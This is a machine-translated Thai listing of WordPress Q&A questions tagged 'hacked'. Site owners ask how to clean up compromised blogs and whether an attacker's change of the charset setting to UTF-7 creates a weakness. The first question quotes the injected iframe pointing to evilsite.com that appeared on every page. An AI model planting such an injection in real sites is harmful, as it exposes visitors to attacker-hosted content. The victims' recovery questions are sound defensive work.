คำถามติดแท็ก hacked

บล็อก WordPress เพื่อความสนุกของฉันที่http://fakeplasticrock.com (ใช้งาน WordPress 3.1.1) ถูกแฮก - มันแสดงให้เห็น<iframe>บนทุกหน้าดังนี้: <iframe src="http://evilsite.com/go/1"></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ฉันทำสิ่งต่อไปนี้ อัปเกรดเป็น 3.1.3 ผ่านระบบอัพเกรด WordPress ในตัว ติดตั้งExploit Scanner (คำเตือนที่สำคัญจำนวนมากเกี่ยวกับไฟล์ที่ผิดปกติ) และAntiVirus (สิ่งนี้แสดงให้เห็นว่าเป็นสีเขียวและสะอาดดังนั้นฉันจึงถอนการติดตั้งและลบออกหลังจากใช้งาน) เปลี่ยนรหัสผ่าน MySQL เปลี่ยนรหัสผ่านผู้ใช้ WordPress ทั้งหมด เชื่อมต่อผ่าน FTP และดาวน์โหลดทั้งระบบไฟล์ (ไม่ใหญ่มากนี่เป็นโฮสติ้งที่ใช้ร่วมกับ WordPress เท่านั้น) ระบบไฟล์แตกต่างจาก ZIP อย่างเป็นทางการของ WordPress 3.1.3 …

105 security  hacked 

ฉันมีลูกค้าที่ถูกแฮ็กเมื่อไม่นานมานี้และสังเกตว่ามีตัวละครแปลก ๆ ปรากฏบนไซต์ของเธอเช่นÂและÆ ปรากฎว่าแฮกเกอร์เปลี่ยน blog_charset เป็น UTF-7 ในwp_optionsตารางในฐานข้อมูล ฉันตั้งค่ากลับเป็น UTF-8 แต่ฉันสงสัยว่าในช่วงเวลานั้นถูกตั้งค่าเป็น UTF-7 จะสามารถสร้างจุดอ่อนด้านความปลอดภัยได้หรือไม่ ฉันได้บางค้นหาและพบว่ามีการใช้เป็นช่องโหว่ WordPress UTF-7 ที่ได้รับการแก้ไขในเวอร์ชัน 2.0.6 เรากำลังใช้งานเวิร์ดเพรสรุ่นล่าสุดดังนั้นพวกเขาจึงไม่สามารถใช้การโกงนั้นได้ แต่มีการหาประโยชน์อื่นที่เกี่ยวข้องกับ UTF-7 หรือไม่? จริงๆแล้วมีเหตุผลอะไรที่แฮ็คเกอร์จะเปลี่ยน blog_charset นอกเหนือไปจากความเจ็บปวดหรือไม่? ฉันพยายามระบุว่าพวกเขาเข้ามาได้อย่างไรและฉันสงสัยว่าสิ่งนี้จะเชื่อมโยงกันอย่างไร

19 security  encoding  hacked  characters